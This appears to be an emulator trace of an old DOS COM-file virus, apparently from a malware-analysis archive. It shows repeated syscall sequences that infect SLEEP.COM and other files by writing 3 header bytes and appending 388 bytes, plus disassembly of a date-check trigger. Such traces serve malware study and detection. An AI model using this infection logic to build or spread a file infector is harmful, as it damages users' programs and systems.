0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
2018-12-25T11:41:49.575882921Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.593581798Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.602187544Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.609854716Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.612745678Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.616168484Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.618255181Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.622472846Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.631605797Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.634517704Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.638439219Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.645994075Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.653266083Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.655157681Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.669879405Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.671708082Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.675903807Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.685979586Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.688713356Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.691969132Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.700480487Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.708306729Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.710186451Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.714089679Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.715710971Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.718712325Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.72802346Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.73050561Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.733432747Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.741340728Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.749386668Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.751340448Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.755443642Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.757825397Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.76111393Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.769905943Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.773286077Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.776616802Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.7848828Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.793048173Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.795081943Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.79851159Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.801024866Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.8103693Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.820355903Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.823871499Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.827227Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.83502139Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.843550597Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.84586045Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:49.854711623Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:49.857258848Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:49.860388503Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.870185854Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.873350112Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.876377872Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:49.88452558Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:49.887626008Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:49.890315086Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:49.893141846Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:49.896226324Z 26 PC: 12bae | Set disk transfer address (See above)
2018-12-25T11:41:49.898280613Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":735,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:41:51.243914451Z 26 PC: 12bae | Set disk transfer address
2018-12-25T11:41:51.249423623Z 78 PC: 12ac9 | Find first file
2018-12-25T11:41:51.255303381Z 61 PC: 12ad4 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:41:51.261482063Z 63 PC: 12ae0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:41:51.268022263Z 66 PC: 12bb6 | Move file pointer
2018-12-25T11:41:51.269340323Z 64 PC: 12b0f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:41:51.271781555Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:51.273137485Z 64 PC: 12b1f | Write file or device (Write 388 bytes on handle 5)
2018-12-25T11:41:51.620285689Z 62 PC: 12b23 | Close file
2018-12-25T11:41:51.628656175Z 42 PC: 12b31 | Get date 0x12b31: cmp cx, 0x7ca
0x12b35: jge 0x12b3b
0x12b37: mov ah, 0x4f
0x12b39: jmp 0x12ac7
0x12b3b: mov ah, 0x2a
0x12b3d: int 0x21
0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
2018-12-25T11:41:51.630764261Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:51.633684327Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:51.639767057Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:51.64652498Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:51.648905063Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:51.65159017Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:51.653005257Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:51.655999284Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:51.661640233Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:51.663070511Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:51.665848312Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:51.672660306Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:51.679248927Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:51.681355561Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:51.684260586Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:51.685486521Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:51.68887553Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:51.696553023Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:51.698968928Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:51.701775648Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:51.708473271Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:51.714841597Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:51.717664977Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:51.720622143Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:51.722420889Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:51.7258946Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:51.731239558Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:51.732826666Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:51.735138672Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:51.739153194Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:51.743112686Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:51.744712712Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:51.746489117Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:51.747417838Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:51.749241079Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:51.754398485Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:51.755827563Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:51.7575584Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:51.761888965Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:51.765876644Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:51.766909298Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:51.769126028Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:51.77024973Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:51.775372174Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:51.781007063Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:51.783410504Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:51.786202699Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:51.794052987Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:51.800686825Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:51.801894821Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:51.805306215Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:51.806693805Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:51.809339955Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:51.81789625Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:51.820227107Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:51.822947079Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:51.829961226Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:51.832709406Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:51.834684798Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:51.837648675Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:51.839865577Z 26 PC: 12bae | Set disk transfer address (See above)
2018-12-25T11:41:51.840735475Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":21,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":735,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:41:52.096749121Z 26 PC: 12bae | Set disk transfer address
2018-12-25T11:41:52.10093942Z 78 PC: 12ac9 | Find first file
2018-12-25T11:41:52.107143152Z 61 PC: 12ad4 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:41:52.114099584Z 63 PC: 12ae0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:41:52.122769663Z 66 PC: 12bb6 | Move file pointer
2018-12-25T11:41:52.124278028Z 64 PC: 12b0f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:41:52.127112304Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:52.128973713Z 64 PC: 12b1f | Write file or device (Write 388 bytes on handle 5)
2018-12-25T11:41:52.148266295Z 62 PC: 12b23 | Close file
2018-12-25T11:41:52.156006069Z 42 PC: 12b31 | Get date 0x12b31: cmp cx, 0x7ca
0x12b35: jge 0x12b3b
0x12b37: mov ah, 0x4f
0x12b39: jmp 0x12ac7
0x12b3b: mov ah, 0x2a
0x12b3d: int 0x21
0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
2018-12-25T11:41:52.158280497Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:52.174959398Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:52.181748401Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:52.188751977Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:52.190875847Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:52.19339169Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:52.194754035Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:52.198560638Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:52.206675038Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:52.208989627Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:52.212335755Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:52.219194442Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:52.225798551Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:52.228048695Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:52.238827131Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:52.240225189Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:52.24337667Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:52.252312014Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:52.25460978Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:52.257931063Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:52.264513727Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:52.271417028Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:52.273568814Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:52.276357772Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:52.278022215Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:52.281104223Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:52.28955454Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:52.291550185Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:52.293976598Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:52.300979274Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:52.307280053Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:52.308814753Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:52.311925355Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:52.313383213Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:52.316137407Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:52.32449492Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:52.3267215Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:52.32926995Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:52.336838597Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:52.343482059Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:52.34485875Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:52.348204043Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:52.349513397Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:52.357219764Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:52.365617439Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:52.367773448Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:52.370251834Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:52.376552021Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:52.382855887Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:52.384129935Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:52.386560876Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:52.388399629Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:52.390809679Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:52.398161122Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:52.400988202Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:52.403507776Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:52.409692149Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:52.412736151Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:52.414342999Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:52.416150662Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:52.418746871Z 26 PC: 12bae | Set disk transfer address (See above)
2018-12-25T11:41:52.419561853Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')